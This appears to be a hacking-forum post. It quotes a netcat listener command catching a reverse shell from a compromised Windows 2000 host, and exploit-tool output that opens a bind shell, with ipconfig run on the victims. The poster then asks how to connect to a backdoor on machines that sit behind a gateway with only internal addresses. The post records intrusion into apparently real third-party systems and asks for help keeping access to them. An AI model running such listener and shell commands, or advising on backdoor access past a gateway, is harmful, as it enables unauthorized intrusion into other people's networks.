QUOTE
>nc.exe -vv -L -p 141
listening on [any] 141 ...
xxx.145.18.36: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xxx.201.161.234] from (UNKNOWN) [xxx.145.18.36] 2851: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.10.16
Subnet Mask . . . . . . . . . . . : 255.255.255.0
IP Address. . . . . . . . . . . . : 192.168.10.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.10
C:\WINNT\system32>
listening on [any] 141 ...
xxx.145.18.36: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xxx.201.161.234] from (UNKNOWN) [xxx.145.18.36] 2851: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.10.16
Subnet Mask . . . . . . . . . . . : 255.255.255.0
IP Address. . . . . . . . . . . . : 192.168.10.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.10
C:\WINNT\system32>
Case bindshell
QUOTE
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
[*] --------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.64.17.49
Subnet Mask . . . . . . . . . . . : 255.255.248.0
Default Gateway . . . . . . . . . : 10.64.16.1
C:\WINNT\system32>
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
[*] --------------------------------------------------------------------
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.64.17.49
Subnet Mask . . . . . . . . . . . : 255.255.248.0
Default Gateway . . . . . . . . . : 10.64.16.1
C:\WINNT\system32>
When u look @ IP u see that the shell connects to the net thrue a gateway. U see only
INTERNAL ip adresses wich means the node is not physicly connected to the inet.
So now my question: If u have a backdoor running on the remote box how can u connect to it ? (When u dont have access to the gateway). Fport is no use.
Anybody want to share the solution ?
THX
(I already have a another topic running on it but i opened a second one cause i didnt explained well what i wanted to ask).